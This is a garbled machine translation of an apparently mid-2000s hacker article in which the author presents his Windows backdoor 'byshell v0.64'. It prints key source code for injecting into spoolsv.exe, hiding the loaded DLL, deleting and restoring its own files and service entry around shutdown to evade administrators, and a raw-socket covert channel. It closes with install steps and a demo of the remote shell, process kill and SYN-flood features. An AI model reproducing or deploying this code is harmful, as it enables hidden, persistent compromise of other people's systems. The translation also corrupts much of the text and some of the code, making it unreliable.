System-level ring3 BackDoor-byshell v0.64 programming and application (zz)

Part 1: Background
Nowadays, there are many popular tools for Post-Trojan Horse categories on the Internet, but there are not many tools that can be called as excellent products. Most new
They are still using winshell, glacier, or Radmin "Remote Management Software" to replace Backdoor programs. No
Fortunately, they do not conform to the standard of a real backdoor and are very easy to be managed by servers with or without experience.
As a result, it is normal that bots are often lost.
A qualified backdoor should at least be implemented: there must be no stranger to the process in the task manager.
The name of a process that looks like a system process is just a false alarm. the startup Item or service startup item cannot be run in the registry.
Leave a well-known startup key value or add a service. Of course, you cannot directly write the startup Item of the Start Menu.
It is the same as ignoring the administrator or FW to open a strange port, like bits. dll waiting for a connection without a port
The program that opened the Port during connection is only valid for Port Check. In addition, it is best to hide your new files.
Or avoid infecting system files that administrators often check for integrity. Backdoor programs not implemented at the first three points
It is not a "relatively advanced" backdoor program.
According to my classification, the common backdoors can be divided into three levels ".
Application-level, such as winshell, Radmin, and glacier, basically did not hide themselves, just
Applications can achieve remote control.
System level, more or less using programming techniques that hide their whereabouts in ring3, such as bits. dll
, Portless, many such as hxdef (although the backdoor has a driver, its hook to the system is all win32a
Pi-level, so everyone tends to be at the system level rather than the kernel level ).
At the kernel level, the backdoor mainly works in ring0, so it is more concealed and lethal. However
The number of kernel-level backdoors is small and the compatibility is not satisfactory. There are many topics in phrack and rootkit.com.
Valuable discussions and results are published.
As I am a beginner in this field, I try my best to do it in my own system-level backdoor byshell v0.64.
The above requirements. However, due to my limited personal ability, I have not achieved comprehensive and stable enough. The source code of the program has been
I hope you can give me some comments or upgrade the version for me before New Year's Day. :)
We will discuss the design and implementation of this open-source backdoor. Of course, there are also examples of the application :)

Part 2: Programming
In this section, I will not list the complete code because it is too long. I will reference the key generation in the original code
Code to illustrate my writing ideas.
The first problem is how to hide a process. A common method is remote thread injection. This
Is a relatively simple implementation method. But its biggest problem is that it injected code into the remote process address.
Due to changes in the address space, it depends on all direct addressing commands in the original address space to be relocated,
The veteran of this assembly language is easy to understand. For high-level language programmers, this means all explicit
Manual relocation is required for non-explicit global variables, such as API addresses and strings. Compared with the virus program
We are very happy because our syringe can inject a global variable block to the remote process at the same time ",
Transmit the block address to the remote function, and then use this block in the remote function to replace the full
Local variables to avoid writing code that is completely "self-relocable. The latter is considered very cumbersome and almost
It cannot be implemented in advanced languages. But even so, the complexity of code that can be relocated is still compared.
Large, the backdoor program with many write function modules will be very tired. The cmdbind2 of the peasant predecessors has been completely Manual
We can see that the source code of the relocated injection Backdoor only implements the most common bind shell.
A lot of code is spent. Complicated backdoor functions such as byshell v0.64 are hard to think about if this method is implemented directly.
.
Instead of writing relocated Code directly, the common method is to load a DLL in a function injected into a remote process.
In this way, the system will relocate for you, and the main function of the backdoor is implemented in the DLL. For example, in the previous anti-DDoS pro,
Dan Changhong introduced this method. This method also has a small drawback: When the Administrator reviews the process injected by you
An unknown dll will be found, leading to the exposure of your backdoor. The peasant predecessors proposed a way of thinking, loading the DLL first,
Then copy all the memory parts to other places, uninstall the DLL, and then apply for an empty address that is the same as the original DLL.
And copy the DLL Code stored elsewhere back to this space. Then, call the DLL directly to solve the problem.
Our DLL does not appear in the list of loaded modules of the injected process. Developed by farmers and
Without implementing his idea as code. The main code for implementing this method will be provided here.
We will also discuss other system-level hidden process methods during a Comparative Discussion.
Bingle's predecessors used the method of replacing the DLL service started by svchost to load backdoors. Zxshell also uses this
Method. The main issue for this type of registration is unstable. You can change the registration table's sensitive key value
Unknown module appears in the loaded module. Of course, if you replace the original DLL with the same name as the original trojan dll, you can avoid
The above problems, but there will be new problems, that is, how to bypass Windows System File Protection and administrator routine
System File integrity check.
Hxdef uses the hook WIN32API method to hide all aspects of hxdef. This method is applicable
The ring3 check results are good, and port multiplexing can be partially implemented. Its main problems are:
There are not many methods, and the effect is relatively low because it is more "active" (hxdef injects Trojan data into all processes in the system ).
Is very good, it is very easy to be found by ring0 rootkit detector, such as icesword. Finally, programming is cumbersome.
I have used the method of injecting the remote spoolsv.exe fake offline Print Service, and the injection is sent remotely.
And then uninstalled a trojan dll-ntboot. dll. The injector is ntboot.exe. For more information, see NT
The injection code in boot.exe.

Void injcode () {handle prohandle; // injection object Process Handle
DWORD pid = 0; // The PID of the object Process
Int ret; // Temporary Variable

// Use the toolhelp32 function to obtain the injection object PID.
Sleep (1000 );
Handle snapshot;
Snapshot = createconlhelp32snapshot (th32cs_snapprocess, 0 );
Struct tagprocessentry32 processsnap;
Processsnap. dwsize = sizeof (tagprocessentry32 );
Char injexe [] = "spoolsv.exe"; // injection object process: you can modify it by yourself.
For (process32first (snapshot, & processsnap );
Process32next (snapshot, & processsnap );){
If (! Stricmp (processsnap. szexefile, injexe ))
{Pid = processsnap. th32processid; break ;}
}
Closehandle (snapshot); // obtain the PID
// Obtain the se_debug_name permission, which is not explained anymore. Many articles have
Handle htoken;
Openprocesstoken (getcurrentprocess (), token_adjust_privileges, & htoken );
Token_privileges TP;
TP. privilegecount = 1;
Lookupprivilegevalue (null, se_debug_name, & TP. Privileges [0]. luid );
TP. Privileges [0]. Attributes = se_privilege_enabled;
Adjusttokenprivileges (htoken, 0, & TP, sizeof (TP), 0, 0 );
// Now go Injection
Prohandle = OpenProcess (process_all_access, 1, pid );
DWORD winapi injfunc (lpvoid); // injfunc is the injection function and needs to be manually relocated
// Obtain the required API address and write it into the global variable block to be injected. injapistr is a global structure and is
Contents of the global variable block
Hmodule;
Lpvoid paramaddr; // global variable block address
Hmodule = loadlibrary ("kernel32.dll ");
Injapistr. myloadlibrary = (struct hinstance _ * (_ stdcall *) (const char
*) Getprocaddress (hmodule, "loadlibrarya ");
Injapistr. mygetprocaddress = (farproc
(_ Stdcall *) (hmodule, lpctstr) getprocaddress (hmodule, "getprocaddress ");
Injapistr. myvirtualalloc = (void * (_ stdcall *) (void *, unsigned long, unsigned
Long, unsigned long) getprocaddress (hmodule, "virtualalloc ");
Injapistr. myfreelibrary = (INT (_ stdcall *) (struct hinstance __
*) Getprocaddress (hmodule, "freelibrary ");
Injapistr. myisbadreadptr = (INT (_ stdcall *) (const void *, unsigned
INT) getprocaddress (hmodule, "isbadreadptr ");
Injapistr. myvirtualfree = (INT (_ stdcall *) (void *, unsigned long, unsigned
Long) getprocaddress (hmodule, "virtualfree ");
// Allocate the global variable block in the target process and write it to the API address
Paramaddr = virtualallocex (prohandle, 0, sizeof (injapistr), mem_commit | mem_reserve
, Page_execute_readwrite );
Ret = writeprocessmemory (prohandle, paramaddr, & injapistr, sizeof (injapistr), 0 );
// Write the injfunc Function
Void *
Injfuncaddr = virtualallocex (prohandle, 0,20000, mem_commit | mem_reserve, page_exec
Ute_readwrite );
Ret = writeprocessmemory (prohandle, injfuncaddr, injfunc, 20000,0 );
// Activate the remote thread
Createremotethread (prohandle, 0, 0, (DWORD (winapi *) (void
*) Injfuncaddr, paramaddr, 0, 0 );
Closehandle (prohandle );
Return;
}

// Inject remote functions to complete the arduous task of loading and uninstalling complex and huge trojan dll functions :)
DWORD winapi injfunc (lpvoid paramaddr ){
// Paramaddr, the first address of the global variable block
// All static global variables need to be relocated (directly addressing), while Dynamic Allocation (heap, virtualalloc)
And stack variables are not required because they use Indirect addressing.
// In fact, the string can also be written into the global variable block just now, but there are not many strings. It is convenient to use ASM directly.

Char ntboot [16];
Char msgbox [16]; // The variable name is incorrect. It should be the name of the main function of the DLL backdoor. Do not mislead the variable.
Home
Injapistr * pinjapistr = (injapistr *) paramaddr;
_ ASM {
MoV ntboot, 'n'
MoV ntboot + 1, 'T'
MoV ntboot + 2, 'B'
MoV ntboot + 3, 'O'
MoV ntboot + 4, 'O'
MoV ntboot + 5, 'T'
MoV ntboot + 6 ,'.'
MoV ntboot + 7, 'd'
MoV ntboot + 8, 'l'
MoV ntboot + 9, 'l'
MoV ntboot + 10, 0
MoV msgbox, 'C'
MoV msgbox + 1, 'M'
MoV msgbox + 2, 'D'
MoV msgbox + 3,'s'
MoV msgbox + 4, 'E'
MoV msgbox + 5, 'R'
MoV msgbox + 6, 'V'
MoV msgbox + 7, 'I'
MoV msgbox + 8, 'C'
MoV msgbox + 9, 'E'
MoV msgbox + 10, 0
}
Hmodule = pinjapistr-> myloadlibrary (ntboot); // load ntboot. dll
DWORD (winapi * mydomainservice) (lpvoid); // name of the main function of the DLL Backdoor
Mydomainservice = (DWORD (winapi
*) (Lpvoid) (pinjapistr-> mygetprocaddress (hmodule, msgbox ));
// Use some tech to release the DLL!
// Hey, the following are the highlights of the audience
Unsigned int memsize = 0;
Void *
Tempdll = pinjapistr-> myvirtualalloc (0, 0x23000, mem_commit | mem_reserve, page_exec
Ute_readwrite );
Memcpy (tempdll, hmodule, 0x23000 );
// 0x23000 is the DLL size, not many. If you change the ntboot. dll size, adjust this value.
Pinjapistr-> myfreelibrary (hmodule );
Hmodule = (hmodule) pinjapistr-> myvirtualalloc (hmodule, 0x23000, mem_commit | mem_re
Serve, page_execute_readwrite );
Memcpy (hmodule, tempdll, 0x23000 );
Pinjapistr-> myvirtualfree (tempdll, 0x23000, mem_decommit );
// End. The DLL is not loaded, but it can be used again.
Mydomainservice (0); // nothing. The main function of the backdoor is called :)
Return 0;
}

The next problem is the startup Item and file. Ntboot.exe is a backdoor injector that starts itself as a service.
. The Administrator must not discover the service key value. What should I do? This is also the idea proposed by the peasant predecessors. Delete first
In addition to all backdoor files and Services, set a shutdown notification and a one-click shutdown hook to write
File and service items. Similarly, once the service is started, it will be deleted first. In this way
No files or startup items. The Administrator cannot find exceptions by using the registry comparison. Nowhere to find our webshell
. Let's take a look at the code that sets a shutdown notification and a one-click shutdown hook.

DWORD winapi hookthread (lpvoid lpparam ){
MSG; int tmpret; char tmpstr [2, 100];
Lresult callback journalrecordproc (INT code, wparam, lparam );
Msghook = setwindowshookex (wh_journalrecord, journalrecordproc, getmodulehandle (0
), 0 );
If (! Msghook) {MessageBox (0, ITOA (getlasterror (), tmpstr, 10), 0, 0); debugbreak ();}
Tmpret = setconsolectrlhandler (handlerroutine, 1 );
If (! Tmpret) {MessageBox (0, ITOA (getlasterror (), tmpstr, 10), 0, 0); debugbreak ();}
While (getmessage (& MSG, null, 0, 0) {void resume ();
If (msg. Message = wm_queryendsession) {resume ();}
}
Unhookwindowshookex (msghook );
Return 0;
}

Bool winapi handlerroutine (DWORD dwctrltype) {void resume ();
Switch (dwctrltype)
{
Case ctrl_shutdown_event:
Resume (); // The Resume function, as the name suggests, is the file recovery startup Item.
Break;
Default:
Break;
}
Return 0;
}

Lresult callback journalrecordproc (INT code, wparam, lparam
Lparam) {void resume ();
If (Code <0) {return callnexthookex (msghook, code, wparam, lparam );}
If (code = hc_action ){
Eventmsg * pevent = (eventmsg *) lparam;
If (pevent-> message = wm_keydown &&
Lobyte (pevent-> paraml) = 0xff) {resume ();}
}
Return callnexthookex (msghook, code, wparam, lparam );
}

Compared with the hook file registry API of hxdef, the advantage of this method is that there is no file at all. No.
The Rootkit detector of ring0 may find files and Registry Keys hidden by hook APIs. The downside is that
If the other party directly pulls the power and shuts down, we will ...... Rest in peace. So we will comfort ourselves and say that this backdoor has enough
The concealment will not make the other party suspect that the backdoors are in progress, so that Bt means of power-down and shutdown will be adopted. If you use hxdef
I believe many of my rootkit detector are common. Only a base rootkit hxdef has been
For all, the Administrator will rest in peace during the inspection.

The last step is how to implement port-free. (For example, hiding a port with Rootkit is not called "No port. Not only
If the firewall fails to pass through the firewall, it will be exposed when the Administrator scans his machine.) Haha, here is the weak byshell v0.64.
. Ring3 backdoor is difficult to use for port multiplexing. Using raw_socket to listen to TCP can only achieve B
As in its. dll, "No port is needed while waiting for connection ". Load yourself into an SPI basic service provider or layered service
Provider, which can intercept all ring3 network communication and leave enough information in the Registry and system to export
To the rest of our backdoors. The Recv/wsarecv function of all processes in the hxdef hook system.
The ring0 port can be reused, such as port 139,445, But it seems better to be reused by port ring3.
. So far byshell adopts the custom protocol of socket_raw, that is, non-TCP non-U.
The DP protocol can communicate through most of the software firewalls and some hardware firewalls, but its disadvantage is that it is not guaranteed.
It passes through all firewalls and does not support Windows XP SP2, because the latter M $ cancels the socket_raw support.
. There seem to be a lot of system-level backdoor software using this method. My implementation is also relatively simple, that is, using an association
Protocol No. 224 listens for connection and refresh, and Protocol No. 225 transmits backdoor data. Very simple.

Wsadata;
Wsastartup (makeword (2, 2), & wsadata );
Socket sock224 = socket (af_inet, fig, 224 );
Sockaddr_in srvaddr;
Memset (& srvaddr, 0, sizeof (struct sockaddr_in ));
Srvaddr. sin_family = af_inet;
Srvaddr. sin_addr.s_un.s_addr = inaddr_any;
Ret = BIND (sock224, (struct sockaddr *) & srvaddr, sizeof (struct sockaddr ));
If (RET) {goto label2 ;}
Dwthreadid = 0; char buffcycle [128];
DWORD winapi threadfunc (lpvoid lpparam );
Handle thrdhndl;
// Create a 225 connection thread
Thrdhndl = createthread (0, 0, threadfunc, 0, 0, & dwthreadid );
// Wait for Refresh
While (1) {recvfrom (sock224, buffets, 0 );
If (! Strncmp (buffenders + 32 + sizeof (ip_header), "+ _) (* & ^ % $ #@!~ Byrefreshbreak ", 27)
&&! Strncmp (buffenders + sizeof (ip_header), PWD, strlen (PWD ))){
Terminatethread (thrdhndl, 0); goto label1 ;}
}

In code 225, I implemented simple error control. The code is long and I will not list it here. If you are interested
Check the source code. This reuse method is not very reliable and stable, so I published byshell v0.63, which is directly enabled
A TCP port 138: completely does not meet the backdoor requirements, but it is acceptable for testing. If it is large
If you find that byshell v0.64 is not stable, try it. However, a serious mistake is that I am in byshell
In the v0.64 instruction manual, a command refresh is missing, which can be used to clear the 225 connection in case of a dead connection and give it to you.
Opportunity to reconnect.
Finally, byshell implements many commands. For example, you can view the system information, execute commands, and connect to the backdoors.
And SYN flood attacks. The function module of the backdoor is the work () function, which facilitates the function.
Expansion and modular programming. My program style is not good, I like not branch and compact code :( but I still want to be big
Let's develop the software together. I will continue to upgrade the port reuse status. It may be written as h later
Ring3 multiplexing like xdef may also be something like ring0's filter driver. We also hope that our predecessors will continue to provide guidance.
Me :) In this backdoor writing, three people gave me the greatest help. Thank you for allowing me to take up space
. They are gxisone, glacier, and farmers. This backdoor should be half of him.
.

Part 3: Application
For applications, the backdoor (0.64) supports the following commands: cmd, Shell, endshell, chpass, byver, and S.
Ysinfo, pslist, pskill, modlist, get, put, reboot, dettach, popmsg, Syn, querydos, enddo
S, refresh, etc. For more information, see the instructions. Note that refresh is missing in the manual and its role is
In case the connection crashes and you are given a chance to reconnect, you can also clear it after you change an IP address.
The original connection (otherwise the connection fails ). Upload ntboot.exe and ntboot. DLL
Run ntboot.exe-install in the same directory as the example. After the installation is complete, delete ntboot.exe and ntbo manually.
Ot. dll, if you are not uploading to the System32 directory. For connection, use by064cli.exe. Note: byshell
V0.64 does not support local testing. V 0.63 is acceptable. Now I will use v 0.63 to briefly demonstrate the effect.

Please input the Server IP Address
127.0.0.1
127.0.0.1 will be connected
Input the password (the default one is 'by ')
By
# Export dir C :/
The volume in drive C is not labeled.
The serial number of the volume is the CCB2-D751

C:/directory

<Dir> Documents and Settings
<Dir> inetpub
2004-11-17 20:56 <dir> intel
24,576 isapilog. dll
2004-11-11 24,576 magic_asp.dll
<Dir> my music
124 operate. ini
<Dir> Program Files
<Dir> ubackup
<Dir> winnt
3 files in 49,276 bytes
124,207,104 bytes available for 7 Directories
# Shell
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/winnt/system32> Cd ..
CD ..

C:/winnt> Cd ..
CD ..

C:/> dir
Dir
The volume in drive C is not labeled.
The serial number of the volume is the CCB2-D751

C:/directory

...... Omitted
3 files in 49,276 bytes
124,207,104 bytes available for 7 Directories

C:/> endshell
Shell terminated
# Byver
Byshell server version 0.63
Released dec 19,2004 Copyleft @ "by" Co. Ltd.
# Pslist
............ There are bugs here, which are not neatly arranged. Let's take a look :(
Process:
PID filename num_thread parentpid
8 system 43 0
184 smss.exe 6 8
208 csrss.exe 11 184
232 winlogon.exe 19 184
260 services.exe 31 232
272 lsass.exe 17 232
456 svchost.exe 11 260
488 spoolsv. EXE 14 260
524 msdtc.exe 21 260
636 svchost.exe 18 260
656 llssrv.exe 9 260
688 sqlservr.exe 28 260
776 winmgmt.exe 3 260
812 dfssvc.exe 2 260
832 inetinfo.exe 29 260
856 mssearch.exe 6 260
1224 svchost.exe 11 260
1176 assumer.exe 19 1172
1356 igfxtray.exe 2 1176
1404 pfwmain.exe 4 1176
1412 soundman. EXE 2 1176
1428 realsched.exe 4 1176
1436 internat.exe 1 1176
1444 sqlmangr.exe 3 1176
1280 bitcomet.exe 9 1176
328 notepad.exe 2 1176
1196 MDM. EXE 5 456
1512 conime.exe 1 1088
1520 cmd.exe 1 488
1504 by063cli.exe 1 1176
# Pskill1428
OK, job was done, cuz we have LocalSystem & se_debug_name :)
# Modlist1520

Mods' of 1520:
Module_id module_name module_path
1 NTDLL. dll C:/winnt/system32/NTDLL. dll
1 kernel32.dll C:/winnt/system32/kernel32.dll
1 user32.dll C:/winnt/system32/user32.dll
1 gdi32.dll C:/winnt/system32/gdi32.dll
1 advapi32.dll C:/winnt/system32/advapi32.dll
1 rpcrt4.dll C:/winnt/system32/rpcrt4.dll
1 msvcrt. dll C:/winnt/system32/msvcrt. dll
1 imm32.dll C:/winnt/system32/imm32.dll
#
Try other complex commands by yourself. Finally, if you have any questions or want to communicate with me, mail them to baiyuanfan @
163. com. Thank you for your attention to byshell and me :)
(End)